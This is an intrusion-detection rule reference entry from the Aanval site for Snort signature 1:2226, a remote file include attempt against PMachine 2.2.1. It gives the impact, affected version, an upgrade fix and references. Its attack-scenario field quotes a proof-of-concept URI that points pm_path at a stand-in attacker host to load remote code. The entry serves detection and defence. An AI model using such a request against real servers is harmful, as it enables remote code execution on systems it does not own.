Provided by Aanval (Snort & Syslog Intrusion Detection and Correlation Engine) www.aanval.com
--
| GEN:SID | 1:2226 |
| Message | WEB-PHP pmachine remote file include attempt |
| Summary | This event is generated when an attempt is made to exploit a known vulnerability in the PHP application pmachine. |
| Impact | Execution of arbitrary code possibly leading to a remote shell. |
| Detailed Information | Versions of PMachine do not properly check included files and it is possible for an attacker to include a file of their choosing which may lead to arbitrary code execution on the target host. |
| Affected Systems | PMachine PMachine 2.2.1 |
| Attack Scenarios | The attacker can include a file of their choosing by appending the file URI to the end of a URI for the application. Proof of concept URI by FrogMan: http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt |
| Ease of Attack | Simple. No exploit software required. |
| Corrective Action | Upgrade to the latest non-affected version of the software. |
| Additional References | |
| Rule References | bugtraq: 7919 nessus: 11739 |
--
DID:121782
--
http://www.aanval.com/